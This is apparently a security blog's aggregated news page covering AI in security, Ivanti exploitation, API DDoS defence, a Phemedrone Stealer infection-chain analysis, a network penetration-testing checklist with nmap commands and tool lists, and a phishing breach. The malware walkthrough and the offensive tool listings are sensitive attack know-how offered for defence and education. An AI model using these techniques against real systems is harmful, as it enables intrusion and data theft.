This article will touch on the ways that this new tech is affecting already established practices, what new practices are arising, and whether or not they are safe and ethical.
HOW DOES AI AFFECT ALREADY ESTABLISHED SECURITY PRACTICES?
It is a fair statement to make that AI is still a nascent technology. Most experts agree that it is far from reaching its full potential, yet even so, it has still been able to disrupt many industries and practices. In terms of already established security practices, AI is providing operators with the opportunity to analyze huge amounts of data at incredible speed and with impressive accuracy. Identifying patterns and detecting anomalies is easy for AI to do, and incredibly useful for most traditional data security practices.
Previously these systems would rely solely on human operators to perform the data analyses, which can prove time-consuming and would be prone to errors. Now, with AI help, human operators need only understand the refined data the AI is providing them and act on it.
IN WHAT WAYS CAN AI BE USED TO BOLSTER AND IMPROVE EXISTING SECURITY MEASURES?
AI can be used in several other ways to improve security measures. In terms of access protection, AI-driven facial recognition and other forms of biometric security can easily provide a relatively foolproof access protection solution. Using biometric access can eliminate passwords, which are often a weak link in data security.
AI’s ability to sort through large amounts of data means that it can be very effective in detecting and preventing cyber threats. An AI-supported network security program could, with relatively little oversight, analyze network traffic, identify vulnerabilities, and proactively defend against any incoming attacks.
THE DIFFICULTIES IN UPDATING EXISTING SECURITY SYSTEMS WITH AI SOLUTIONS
The most pressing difficulty is that some old systems are simply not compatible with AI solutions. Security systems designed and built to be operated solely by humans are often not able to be retrofitted with AI algorithms, which means that any upgrades necessitate a complete, and likely expensive, overhaul of the security systems.
One industry that has been quick to embrace AI-powered security systems is the online gambling industry. For those who are interested in seeing what AI-driven security can look like, visiting a casino online and investigating its security protocols will give you an idea of what is possible. Having an industry that has been an early adoption of such a disruptive technology can help other industries learn what to do and what not to do. In many cases, online casinos staged entire overhauls of their security suites to incorporate AI solutions, rather than trying to incorporate new tech, with older non-compatible security technology.
Another important factor in the difficulty of incorporating AI systems is that it takes a very large amount of data to properly train an AI algorithm. Thankfully, other companies are doing this work, and it should be possible to buy an already trained AI, fit to purpose. All that remains is trusting that the trainers did their due diligence and that the AI will be effective.
EFFECTIVENESS OF AI-DRIVEN SECURITY SYSTEMS
AI-driven security systems are, for the most part, lauded as being effective. With faster threat detection and response times quicker than humanly possible, the advantage of using AI for data security is clear.
AI has also proven resilient in terms of adapting to new threats. AI has an inherent ability to learn, which means that as new threats are developed and new vulnerabilities emerge, a well-built AI will be able to learn and eventually respond to new threats just as effectively as old ones.
It has been suggested that AI systems must completely replace traditional data security solutions shortly. Part of the reason for this is not just their inherent effectiveness, but there is an anticipation that incoming threats will also be using AI. Better to fight fire with fire.
IS USING AI FOR SECURITY DANGEROUS?
The short answer is no, the long answer is no, but. The main concern when using AI security measures with little human input is that they could generate false positives or false negatives. AI is not infallible, and despite being able to process huge amounts of data, it can still get confused.
It could also be possible for the AI security system to itself be attacked and become a liability. If an attack were to target and inject malicious code into the AI system, it could see a breakdown in its effectiveness which would potentially allow multiple breaches.
The best remedy for both of these concerns is likely to ensure that there is still an alert human component to the security system. By ensuring that well-trained individuals are monitoring the AI systems, the dangers of false positives or attacks on the AI system are reduced greatly.
ARE THERE LEGITIMATE ETHICAL CONCERNS WHEN AI IS USED FOR SECURITY?
Yes. The main ethical concern relating to AI when used for security is that the algorithm could have an inherent bias. This can occur if the data used for the training of the AI is itself biased or incomplete in some way.
Another important ethical concern is that AI security systems are known to sort through personal data to do their job, and if this data were to be accessed or misused, privacy rights would be compromised.
Many AI systems also have a lack of transparency and accountability, which compounds the problem of the AI algorithm’s potential for bias. If an AI is concluding that a human operator cannot understand the reasoning, the AI system must be held suspect.
CONCLUSION
AI could be a great boon to security systems and is likely an inevitable and necessary upgrade. The inability of human operators to combat AI threats alone seems to suggest its necessity. Coupled with its ability to analyze and sort through mountains of data and adapt to threats as they develop, AI has a bright future in the security industry.
However, AI-driven security systems must be overseen by trained human operators who understand the complexities and weaknesses that AI brings to their systems.
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 19 2024
New Microsoft Incident Response guides help security teams analyze suspicious activity
“Today Microsoft Incident Response are proud to introduce two one-page guides to help security teams investigate suspicious activity in Microsoft 365 and Microsoft Entra. These guides contain the artifacts that Microsoft Incident Response hunts for and uses daily to provide our customers with evidence of Threat Actor activity in their tenant.”
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 19 2024
OSINVGPT – A Tool For Open-Source Investigations
OSINVGPT is an AI-based system that helps security analysts with open-source investigations and tool selection. While this tool was developed by “Very Simple Research.”
This tool can assist security analysts in gathering relevant information, sources, and tools for their investigations. It even helps researchers produce reports and summaries of their results.
OSINVGPT is available on ChatGPT and is useful for security researchers as it saves both time and effort.
Key Aspects
Here below, we have mentioned all the key aspects that OSINVGPT can do:-
- Data Analysis
- Interpretation
- Guidance on Methodology
- Case Studies
- Examples
- Document Analysis
- Fact-Checking
- Verification
- Recommendations Based on External Sources
- Ethical Considerations
OSINVGPT’s data analysis and interpretation involve examining information from diverse open sources to form readable narratives and address specific queries. At the same time, guidance is offered on conducting transparent and accurate open-source investigations.
Detailed insights and suggestions are provided using real-world examples within the knowledge base. Appropriate data is analyzed and extracted from the uploaded documents for open-source investigations.
To ensure investigation accuracy, assistance is given in fact-checking using open-source data. Recommendations based on external sources are provided for queries beyond the direct knowledge base, with a focus on ethical considerations in open-source investigations for responsible conduct.
Moreover, if you want, you can access the OSINVGPT tool from here for open-source investigation.
Related articles on Security Tools
Open Source Intelligence Methods and Tools: A Practical Guide to Online Intelligence
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 19 2024
CISA: Critical Ivanti auth bypass bug now actively exploited
CISA warns that a critical authentication bypass vulnerability in Ivanti’s Endpoint Manager Mobile (EPMM) and MobileIron Core device management software (patched in August 2023) is now under active exploitation.
Tracked as CVE-2023-35082, the flaw is a remote unauthenticated API access vulnerability affecting all versions of EPMM 11.10, 11.9, and 11.8 and MobileIron Core 11.7 and below,.
Successful exploitation provides attackers access to personally identifiable information (PII) of mobile device users and can let them backdoor compromised servers when chaining the bug with other flaws.
“Ivanti has an RPM script available now. We recommend customers first upgrade to a supported version and then apply the RPM script,” the company said in August. “More detailed information can be found in this Knowledge Base articleon the Ivanti Community portal.”
Cybersecurity company Rapid7, which discovered and reported the vulnerability, provides indicators of compromise(IOCs) to help admins detect signs of a CVE-2023-35082 attack.
According to Shodan, 6,300 Ivanti EPMM user portals are currently exposed online, while the Shadowserver threat monitoring platform tracks 3,420 Internet-exposed EPMM appliances.
Shodan’s data also reveals that the more than 150 instances linked to government agencies worldwide can be directly accessed via the Internet.
While it has yet to provide further details on CVE-2023-35082 active exploitation, CISA added the vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation and says there’s no evidence of abuse in ransomware attacks.
The cybersecurity agency also ordered U.S. federal agencies to patch it by February 2, as required by a binding operational directive (BOD 22-01) issued three years ago.
Ivanti has yet to update its August advisories or issue another notification warning that attackers are using this security vulnerability in the wild.
Two other Ivanti Connect Secure (ICS) zero-days, an auth bypass (CVE-2023-46805) and a command injection (CVE-2024-21887) are now also under mass exploitation by multiple threat groups, starting January 11.
Victims compromised so far range from small businesses to multiple Fortune 500 companies from various industry sectors, with the attackers having already backdoored over 1,700 ICS VPN appliances using a GIFTEDVISITOR webshell variant.
Multiple other Ivanti zero-days (i.e., CVE-2021-22893, CVE-2023-35078, CVE-2023-35081, CVE-2023-38035) have been exploited in recent years to breach dozens of government, defense, and financial organizations across the United States and Europe, several Norwegian government organizations, as well as in targeted attacks.
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 18 2024
How Do You Protect Your APIs From DDoS Attacks?
Today, DDoS attacks stand out as the most widespread cyber threat, extending their impact to APIs.
When successfully executed, these attacks can cripple a system, presenting a more severe consequence than DDoS incidents targeting web applications.
The increased risk amplifies the potential for reputational damage to the company associated with the affected APIs.
How Does DDoS Affect Your APIs?
A DDoS attack on an API involves overwhelming the targeted API with a flood of traffic from multiple sources, disrupting its normal functioning and causing it to become unavailable to legitimate users.
This attack can be particularly damaging as APIs play a crucial role in enabling communication between different software applications, and disruption can impact the overall functionality of interconnected systems.
The impact of DDoS attacks is particularly severe for businesses and organizations that depend on their APIs to deliver essential services to customers. These attacks, employing methods such as UDP floods, SYN floods, HTTP floods, and others, pose a significant threat.
Typically orchestrated through botnets—networks of compromised devices under the control of a single attacker—DDoS attacks can cripple a target’s functionality.
DDoS attacks on APIs focus on the server and each part of your API service. But how do attackers manage to exploit DDoS attacks on APIs?
This Webinar on API attack simulation shows an example of a DDoS attack on APIs and how WAAP can protect the API endpoints.
Several factors can make APIs vulnerable to DDoS attacks:
Absence or insufficient Rate-Limiting: If an API lacks robust rate-limiting mechanisms, attackers can exploit this weakness by sending a massive volume of requests in a short period, overwhelming the system’s capacity to handle them.
Inadequate Authentication and Authorization: Weak or compromised authentication measures can allow malicious actors to gain unauthorized access to an API. Once inside, they may misuse the API by flooding it with requests, leading to a DDoS scenario.
Insufficient Monitoring and Anomaly Detection: Ineffective monitoring and anomaly detection systems can make identifying abnormal traffic patterns associated with a DDoS attack challenging. Prompt detection is crucial for implementing mitigation measures.
Scalability Issues: APIs that cannot scale dynamically in response to increased traffic may become targets for DDoS attacks. A sudden surge in requests can overload the system if it cannot scale its resources efficiently.
How Do WAAP Solutions Protect Against DDoS Attacks on API?
Web Application and API Protection (WAAP) platform offers in-line blocking capabilities for all layer seven traffic, comprehensively securing web applications and APIs.
To guarantee robust security, WAFs incorporated into WAAP solutions provide immediate defense by filtering, monitoring, detecting, and automatically blocking malicious traffic, thereby preventing its access to the server.
Active monitoring of traffic on an API endpoint enables the identification of abnormal traffic patterns commonly linked to DDoS attacks. Instances of sudden spikes in traffic volume serve as red flags for potential attacks, and a proficient monitoring system can promptly detect and address such increases.
In addition, WAAP enforces rate limits by assessing the number of requests from an IP address. API rate limiting is critical in mitigating DDoS damage and reducing calls, data volume, and types. Setting limits aligned with API capacity and user needs enhances security and improves the user experience.
To avoid impacting genuine users, find solutions that use behavioral analysis technologies to establish a baseline for rate limiting.
AppTrana WAAP’s DDoS mitigation employs adaptive behavioral analysis for comprehensive defense, detecting and mitigating various DDoS attacks with a layered approach. It distinguishes between “flash crowds” and real DDoS attacks, using real-time behavioral analysis for precise mitigation. This enhances accuracy compared to static rate limit-based systems.
Advanced API Security: OAuth 2.0 and Beyond
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 18 2024
HOW TO EXPLOIT WINDOWS DEFENDER ANTIVIRUS TO INFECT A DEVICE WITH MALWARE
Trend Micro’s recent threat hunting efforts have uncovered active exploitation of CVE-2023-36025, a vulnerability in Microsoft Windows Defender SmartScreen, by a new strain of malware known as Phemedrone Stealer. This malware targets web browsers, cryptocurrency wallets, and messaging apps like Telegram, Steam, and Discord, stealing data and sending it to attackers via Telegram or command-and-control servers. Phemedrone Stealer, an open-source stealer written in C#, is actively maintained on GitHub and Telegram.
CVE-2023-36025 arises from insufficient checks on Internet Shortcut (.url) files, allowing attackers to bypass Windows Defender SmartScreen warnings by using crafted .url files that download and execute malicious scripts . Microsoft patched this vulnerability on November 14, 2023, but its exploitation in the wild led to its inclusion in the Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities list. Various malware campaigns, including those distributing Phemedrone Stealer, have since incorporated this vulnerability.
INITIAL ACCESS VIA CLOUD-HOSTED MALICIOUS URLS
As per the report, this involves leveraging cloud-hosted URLs that are malicious in nature. The article provides insights into how these URLs are used to initiate the attack, highlighting the strategies employed for distributing the malware and penetrating target systems. Attackers host malicious Internet Shortcut files on platforms like Discord or cloud services, often disguised using URL shorteners. Unsuspecting users who open these files trigger the exploitation of CVE-2023-36025.
DEFENSE EVASION TACTICS
The malicious .url file downloads and executes a control panel item (.cpl) file from an attacker-controlled server. This bypasses the usual security prompt from Windows Defender SmartScreen. The malware employs MITRE ATT&CK technique T1218.002, using the Windows Control Panel process binary to execute .cpl files, which are essentially DLL files.
- Initial Infection via Malicious .url File (CVE-2023-36025): The attack begins when a user executes a malicious Internet Shortcut (.url) file. This file is designed to bypass Microsoft Windows Defender SmartScreen warnings, typically triggered for files from untrusted sources. The evasion is likely achieved by manipulating the file’s structure or content, making it appear benign.
- Execution of a Control Panel Item (.cpl) File: Once executed, the .url file connects to an attacker-controlled server to download a .cpl file. In Windows, .cpl files are used to execute Control Panel items and are essentially Dynamic Link Libraries (DLLs). This step involves the MITRE ATT&CK technique T1218.002, which exploits the Windows Control Panel process binary (
control.exe) to execute .cpl files. - Use of rundll32.exe for DLL Execution: The .cpl file, when executed through
control.exe, then callsrundll32.exe, a legitimate Windows utility used to run functions stored in DLL files. This step is critical as it uses a trusted Windows process to execute the malicious DLL, further evading detection. - PowerShell Utilization for Payload Download and Execution: The malicious DLL acts as a loader to call Windows PowerShell, a task automation framework. PowerShell is then used to download and execute the next stage of the attack from GitHub.
- Execution of DATA3.txt PowerShell Loader: The file
DATA3.txt, hosted on GitHub, is an obfuscated PowerShell script designed to be difficult to analyze statically (i.e., without executing it). It uses string and digit manipulation to mask its true intent. - Deobfuscation and Execution of the GitHub-Hosted Loader: Through a combination of static and dynamic analysis, the obfuscated PowerShell commands within
DATA3.txtcan be deobfuscated. This script is responsible for downloading a ZIP file from the same GitHub repository. - Contents of the Downloaded ZIP File:
- WerFaultSecure.exe: A legitimate Windows Fault Reporting binary.
- Wer.dll: A malicious binary that is sideloaded (executed in the context of a legitimate process) when
WerFaultSecure.exeis run. - Secure.pdf: An RC4-encrypted second-stage loader, presumably containing further malicious code.
This attack is sophisticated, using multiple layers of evasion and leveraging legitimate Windows processes and binaries to conceal malicious activities. The use of GitHub as a hosting platform for malicious payloads is also noteworthy, as it can lend an appearance of legitimacy and may bypass some network-based security controls.
PERSISTENCE AND DLL SIDELOADING
The malware achieves persistence by creating scheduled tasks and uses DLL sideloading techniques. The malicious DLL, crucial for the loader’s functionality, decrypts and runs the second stage loader. It uses dynamic API resolving and XOR-based algorithms for string decryption, complicating reverse engineering efforts.
- Malicious DLL (wer.dll) Functionality: It decrypts and runs a second-stage loader. To avoid detection and hinder reverse engineering, it employs API hashing, string encryption, and is protected by VMProtect.
- DLL Sideloading Technique: The malware deceives the system into loading the malicious wer.dll by placing it in the application directory, a method that exploits the trust Windows has in its own directories.
- Dynamic API Resolving: To avoid detection by static analysis tools, the malware uses CRC-32 hashing for storing API names, importing them dynamically during runtime.
- XOR-based String Decryption: An algorithm is used to decrypt strings, with each byte’s key generated based on its position. This method is designed to complicate automated decryption efforts.
- Persistence Mechanism: The malware creates a scheduled task to regularly execute WerFaultSecure.exe. This ensures that the malware remains active on the infected system.
- Second-Stage Loader (secure.pdf): It’s decrypted using an undocumented function from advapi32.dll, with memory allocation and modification handled by functions from Activeds.dll and VirtualProtect.
- Execution Redirection through API Callbacks: The malware cleverly redirects execution flow to the second-stage payload using Windows API callback functions, particularly exploiting the CryptCATCDFOpen function.
Overall, this malware demonstrates a deep understanding of Windows internals, using them to its advantage to stay hidden and maintain persistence on the infected system. The combination of techniques used makes it a complex and dangerous threat.
SECOND-STAGE DEFENSE EVASION
The second-stage loader, known as Donut, is an open-source shellcode that executes various file types in memory. It encrypts payloads without compression and uses the Unmanaged CLR Hosting API to load the Common Language Runtime, creating a new Application Domain for running assemblies.Here’s an overview of how Donut is used for defense evasion and payload execution:
- Donut Shellcode Loader:
- Capabilities: Allows execution of VBScript, JScript, EXE files, DLL files, and .NET assemblies directly in memory.
- Deployment Options: Can be embedded into the loader or staged from an HTTP or DNS server. In this case, it’s embedded directly into the loader.
- Payload Compression and Encryption:
- Compression Techniques: Supports aPLib, LZNT1, Xpress, and Xpress Huffman through RtlCompressBuffer.
- Encryption: Uses the Chaskey block cipher for payload encryption. In this instance, only encryption is used, without compression.
- Execution Process via Unmanaged CLR Hosting API:
- CLR Loading: Donut configures to use the Unmanaged CLR Hosting API to load the Common Language Runtime (CLR) into the host process.
- Application Domain Creation: Creates a new Application Domain, allowing assemblies to run in disposable AppDomains.
- Assembly Loading and Execution: Once the AppDomain is prepared, Donut loads the .NET assembly and invokes the payload’s entry point.
The use of Donut in this attack is particularly notable for its ability to execute various types of code directly in memory. This method greatly reduces the attack’s visibility to traditional security measures, as it leaves minimal traces on the filesystem. Additionally, the use of memory-only execution tactics, coupled with sophisticated encryption, makes the payload difficult to detect and analyze. The ability to create and use disposable AppDomains further enhances evasion by isolating the execution environment, reducing the chances of detection by runtime monitoring tools. This approach demonstrates a high level of sophistication in evading defenses and executing the final payload stealthily.
PHEMEDRONE STEALER PAYLOAD ANALYSIS
Phemedrone Stealer initializes its configuration and decrypts items like Telegram API tokens using the RijndaelManaged symmetric encryption algorithm. It targets a wide range of applications to extract sensitive information, including Chromium-based browsers, crypto wallets, Discord, FileGrabber, FileZilla, Gecko-based browsers, system information, Steam, and Telegram.
COMMAND AND CONTROL FOR DATA EXFILTRATION
After data collection, the malware compresses the information into a ZIP file and validates the Telegram API token before exfiltrating the data. It sends system information and statistics to the attacker via the Telegram API. Despite the patch for CVE-2023-36025, threat actors continue to exploit this vulnerability to evade Windows Defender SmartScreen protection. The Phemedrone Stealer campaign highlights the need for vigilance and updated security measures against such evolving cyber threats.
MITIGATION
Mitigating the risks associated with CVE-2023-36025 and similar vulnerabilities, especially in the context of the Phemedrone Stealer campaign, involves a multi-layered approach. Here are some key strategies:
- Apply Security Patches: Ensure that all systems are updated with the latest security patches from Microsoft, particularly the one addressing CVE-2023-36025. Regularly updating software can prevent attackers from exploiting known vulnerabilities.
- Enhance Endpoint Protection: Utilize advanced endpoint protection solutions that can detect and block sophisticated malware like Phemedrone Stealer. These solutions should include behavior-based detection to identify malicious activities.
- Educate Users: Conduct security awareness training for all users. Educate them about the dangers of clicking on unknown links, opening suspicious email attachments, and the risks of downloading files from untrusted sources.
- Implement Network Security Measures: Use firewalls, intrusion detection systems, and intrusion prevention systems to monitor and control network traffic based on an applied set of security rules.
- Secure Email Gateways: Deploy email security solutions that can scan and filter out malicious emails, which are often the starting point for malware infections.
- Regular Backups: Regularly back up data and ensure that backup copies are stored securely. In case of a malware infection, having up-to-date backups can prevent data loss.
- Use Application Whitelisting: Control which applications are allowed to run on your network. This can prevent unauthorized applications, including malware, from executing.
- Monitor and Analyze Logs: Regularly review system and application logs for unusual activities that might indicate a breach or an attempt to exploit vulnerabilities.
- Restrict User Privileges: Apply the principle of least privilege by limiting user access rights to only those necessary for their job functions. This can reduce the impact of a successful attack.
- Incident Response Plan: Have a well-defined incident response plan in place. This should include procedures for responding to a security breach and mitigating its impact.
- Use Secure Web Gateways: Deploy web gateways that can detect and block access to malicious websites, thereby preventing the download of harmful content.
- Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and address potential security gaps in the network.
By implementing these measures, organizations can significantly reduce their risk of falling victim to malware campaigns that exploit vulnerabilities like CVE-2023-36025.
Learn Malware Removal Techniques: How to remove malwares from a computer
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 15 2024
Network Penetration Testing Checklist – 2024
Network Penetration Testing checklist determines vulnerabilities in the network posture by discovering open ports, troubleshooting live systems, and services, and grabbing system banners.
The pen-testing helps the administrator close unused ports, add additional services, hide or customize banners, troubleshoot services, and calibrate firewall rules.
You should test in all ways to guarantee there is no security loophole.
Network penetration testing, also known as ethical hacking or white-hat hacking, is a systematic process of evaluating the security of a computer network infrastructure.
The goal of a network penetration test is to identify vulnerabilities and weaknesses in the network’s defenses that malicious actors could potentially exploit.
Network penetration testing is a critical process for evaluating the security of a computer network by simulating an attack from malicious outsiders or insiders. Here is a comprehensive checklist for conducting network penetration testing:
Pre-Engagement Activities
- Define Scope: Clearly define the scope of the test, including which networks, systems, and applications will be assessed.
- Get Authorization: Obtain written permission from the organization’s management to conduct the test.
- Legal Considerations: Ensure compliance with all relevant laws and regulations.
- Set Objectives: Establish what the penetration test aims to achieve (e.g., identifying vulnerabilities, testing incident response capabilities).
- Plan and Schedule: Develop a testing schedule that minimizes impact on normal operations.
Reconnaissance
- Gather Intelligence: Collect publicly available information about the target network (e.g., via WHOIS, DNS records).
- Network Mapping: Identify the network structure, IP ranges, domain names, and accessible systems.
- Identify Targets: Pinpoint specific devices, services, and applications to target during the test.
Threat Modeling
- Identify Potential Threats: Consider possible threat actors and their capabilities, objectives, and methods.
- Assess Vulnerabilities: Evaluate which parts of the network might be vulnerable to attack.
Vulnerability Analysis
- Automated Scanning: Use tools to scan for known vulnerabilities (e.g., Nessus, OpenVAS).
- Manual Testing Techniques: Perform manual checks to complement automated tools.
- Document Findings: Keep detailed records of identified vulnerabilities.
Exploitation
- Attempt Exploits: Safely attempt to exploit identified vulnerabilities to gauge their impact.
- Privilege Escalation: Test if higher levels of access can be achieved.
- Lateral Movement: Assess the ability to move across the network from the initial foothold.
Post-Exploitation
- Data Access and Exfiltration: Evaluate what data can be accessed or extracted.
- Persistence: Check if long-term access to the network can be maintained.
- Cleanup: Remove any tools or scripts installed during the testing.
Analysis and Reporting
- Compile Findings: Gather all data, logs, and evidence.
- Risk Assessment: Analyze the risks associated with the identified vulnerabilities.
- Develop Recommendations: Propose measures to mitigate or eliminate vulnerabilities.
- Prepare Report: Create a detailed report outlining findings, risks, and recommendations.
Review and Feedback
- Present Findings: Share the report with relevant stakeholders.
- Discuss Remediation Strategies: Work with the IT team to discuss ways to address vulnerabilities.
- Plan for Re-Testing: Schedule follow-up tests to ensure vulnerabilities are effectively addressed.
Continuous Improvement
- Update Security Measures: Implement the recommended security enhancements.
- Monitor for New Vulnerabilities: Regularly scan and test the network as new threats emerge.
- Educate Staff: Train staff on new threats
and security best practices.
Tools and Techniques
- Select Tools: Choose appropriate tools for scanning, exploitation, and analysis (e.g., Metasploit, Wireshark, Burp Suite).
- Custom Scripts and Tools: Sometimes custom scripts or tools are required for specific environments or systems.
Ethical and Professional Conduct
- Maintain Confidentiality: All findings should be kept confidential and shared only with authorized personnel.
- Professionalism: Conduct all testing with professionalism, ensuring no unnecessary harm is done to the systems.
Post-Engagement Activities
- Debrief Meeting: Conduct a meeting with the stakeholders to discuss the findings and next steps.
- Follow-Up Support: Provide support to the organization in addressing the vulnerabilities.
Documentation and Reporting
- Detailed Documentation: Ensure that every step of the penetration test is well-documented.
- Clear and Actionable Reporting: The final report should be understandable to both technical and non-technical stakeholders and provide actionable recommendations.
Compliance and Standards
- Adhere to Standards: Follow industry standards and best practices (e.g., OWASP, NIST).
- Regulatory Compliance: Ensure the testing process complies with relevant industry regulations (e.g., HIPAA, PCI-DSS).
Final Steps
- Validation of Fixes: Re-test to ensure vulnerabilities have been properly addressed.
- Lessons Learned: Analyze the process for any lessons that can be learned and applied to future tests.
Awareness and Training
- Organizational Awareness: Increase awareness about network security within the organization.
- Training: Provide training to staff on recognizing and preventing security threats.
By following this checklist, organizations can conduct thorough and effective network penetration tests, identifying vulnerabilities and strengthening their network security posture.
Let’s see how we conduct step-by-step Network penetration testing using famous network scanners.
1. Host Discovery
Footprinting is the first and most important phase where one gathers information about their target system.
DNS footprinting helps to enumerate DNS records like (A, MX, NS, SRV, PTR, SOA, and CNAME) resolving to the target domain.
- A – A record is used to point the domain name such as gbhackers.com to the IP address of its hosting server.
- MX – Records responsible for Email exchange.
- NS – NS records are to identify DNS servers responsible for the domain.
- SRV – Records to distinguish the service hosted on specific servers.
- PTR – Reverse DNS lookup, with the help of IP you can get domains associated with it.
- SOA – Start of record, it is nothing but the information in the DNS system about DNS Zone and other DNS records.
- CNAME – Cname record maps a domain name to another domain name.
We can detect live hosts, and accessible hosts in the target network by using network scanning tools such as Advanced IP scanner, NMAP, HPING3, and NESSUS.
Ping&Ping Sweep:
- root@kali:~# nmap -sn 192.168.169.128
- root@kali:~# nmap -sn 192.168.169.128-20 To ScanRange of IP
- root@kali:~# nmap -sn 192.168.169.* Wildcard
- root@kali:~# nmap -sn 192.168.169.128/24 Entire Subnet
Whois Information
To obtain Whois information and the name server of a website
root@kali:~# whois testdomain.com
- http://whois.domaintools.com/
- https://whois.icann.org/en
Traceroute
Network Diagonastic tool that displays route path and transit delay in packets
root@kali:~# traceroute google.com
Online Tools
- http://www.monitis.com/traceroute/
- http://ping.eu/traceroute/
2. Port Scanning
Perform port scanning using Nmap, Hping3, Netscan tools, and Network monitor. These tools help us probe a server or host on the target network for open ports.
Open ports allow attackers to enter and install malicious backdoor applications.
- root@kali:~# nmap –open gbhackers.com
- To find all open ports root@kali:~# nmap -p 80 192.168.169.128
- Specific Portroot@kali:~# nmap -p 80-200 192.168.169.128
- Range of ports root@kali:~# nmap -p “*” 192.168.169.128
Online Tools
- http://www.yougetsignal.com/
- https://pentest-tools.com/information-gathering/find-subdomains-of-domain
3. Banner Grabbing/OS Fingerprinting
Perform banner grabbing or OS fingerprinting using tools such as Telnet, IDServe, and NMAP to determine the operating system of the target host.
Once you know the version and operating system of the target, you need to find the vulnerabilities and exploit them. Try to gain control over the system.
root@kali:~# nmap -A 192.168.169.128
root@kali:~# nmap -v -A 192.168.169.128 with high verbosity level
IDserve is another good tool for banner grabbing.
Online Tools
- https://www.netcraft.com/
- https://w3dt.net/tools/httprecon
- https://www.shodan.io/
4. Scan For Vulnerabilities
Scan the network using vulnerabilities using GIFLanguard, Nessus, Ratina CS, SAINT.
These tools help us find vulnerabilities in the target system and operating systems. With these steps, you can find loopholes in the target network system.
GFILanguard
It acts as a security consultant and offers patch management, vulnerability assessment, and network auditing services.
Nessus
Nessus is a vulnerability scanner tool that searches for bugs in the software and finds a specific way to violate the security of a software product.
- Data gathering.
- Host identification.
- Port scan.
- Plug-in selection.
- Reporting of data.
5. Draw Network Diagrams
Draw a network diagram about the organization that helps you to understand the logical connection path to the target host in the network.
The network diagram can be drawn by LANmanager, LANstate, Friendly pinger, and Network View.
6. Prepare Proxies
Proxies act as an intermediary between two networking devices. A proxy can protect the local network from outside access.
With proxy servers, we can anonymize web browsing and filter unwanted content, such as ads.
Proxies such as Proxifier, SSL Proxy, Proxy Finder, etc., are used to hide from being caught.
6. Document All Findings
The last and very important step is to document all the findings from penetration testing.
This document will help you find potential vulnerabilities in your network. Once you determine the vulnerabilities, you can plan counteractions accordingly.
You can download the rules and scope Worksheet here – Rules and Scope sheet
Thus, penetration testing helps assess your network before it gets into real trouble that may cause severe loss in value and finance.
Important Tools Used For Network Pentesting
Frameworks
Kali Linux, Backtrack5 R3, Security Onion
Reconnaisance
Smartwhois, MxToolbox, CentralOps, dnsstuff, nslookup, DIG, netcraft
Discovery
Angry IP scanner, Colasoft ping tool, nmap, Maltego, NetResident,LanSurveyor, OpManager
Port Scanning
Nmap, Megaping, Hping3, Netscan tools pro, Advanced port scannerService Fingerprinting Xprobe, nmap, zenmap
Enumeration
Superscan, Netbios enumerator, Snmpcheck, onesixtyone, Jxplorer, Hyena, DumpSec, WinFingerprint, Ps Tools, NsAuditor, Enum4Linux, nslookup, Netscan
Scanning
Nessus, GFI Languard, Retina, SAINT, Nexpose
Password Cracking
Ncrack, Cain & Abel, LC5, Ophcrack, pwdump7, fgdump, John The Ripper,Rainbow Crack
Sniffing
Wireshark, Ettercap, Capsa Network Analyzer
MiTM Attacks
Cain & Abel, Ettercap
Exploitation
Metasploit, Core Impact
You should concentrate on These most important checklists with Network Penetration Testing.
Network Penetration Testing with Nmap
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 12 2024
Framework discloses data breach after accountant gets phished
Framework Computer disclosed a data breach exposing the personal information of an undisclosed number of customers after Keating Consulting Group, its accounting service provider, fell victim to a phishing attack.
The California-based manufacturer of upgradeable and modular laptops says a Keating Consulting accountant was tricked on January 11 by a threat actor impersonating Framework’s CEO into sharing a spreadsheet containing customers’ personally identifiable information (PII) “associated with outstanding balances for Framework purchases.”
“On January 9th, at 4:27am PST, the attacker sent an email to the accountant impersonating our CEO asking for Accounts Receivable information pertaining to outstanding balances for Framework purchases,” the company says in data breach notification letters sent to affected individuals.
“On January 11th at 8:13am PST, the accountant responded to the attacker and provided a spreadsheet with the following information: Full Name, Email Address, Balance Owed.
“Note that this list was primarily of a subset of open pre-orders, but some completed past orders with pending accounting syncs were also included in this list.”
Framework says its Head of Finance notified Keating Consulting’s leadership of the attack once he became aware of the breach roughly 29 minutes after the external accountant replied to the attacker’s emails at 8:42 AM PST on January 11th.
As part of a subsequent investigation, the company identified all customers whose information was exposed in the attack and notified them of the incident via email.
Affected customers warned of phishing risks
Since the exposed data includes the names of customers, their email addresses, and their outstanding balances, it could potentially be used in phishing attacks that impersonate the company to request payment information or redirect to malicious websites designed to gather even more sensitive information from those impacted.
The company added that it only sends emails from ‘support@frame.work’ asking customers to update their information when a payment has failed and it never asks for payment information via email. Customers are urged to contact the company’s support team about any suspicious emails they receive.
Framework says that from now on, all Keating Consulting employees with access to Framework customer information will be required to have mandatory phishing and social engineering attack training.
“We are also auditing their standard operating procedures around information requests,” the company added.
“We are additionally auditing the trainings and standard operating procedures of all other accounting and finance consultants who currently or previously have had access to customer information.”
A Framework spokesperson was not immediately available for comment when BleepingComputer asked about the number of affected customers in the data breach.
Big Breaches: Cybersecurity Lessons for Everyone
InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory
Jan 12 2024
Fake Recruiters Defraud Facebook Users via Remote-Work Offers
Scammers are targeting multiple brands with “job offers” on Meta’s social media platform, that go as far as to offer what look like legitimate job contracts to victims.
A fresh wave of job scams is spreading on Meta’s Facebook platform that aims to lure users with offers for remote-home positions and ultimately defraud them by stealing their personal data and banking credentials.
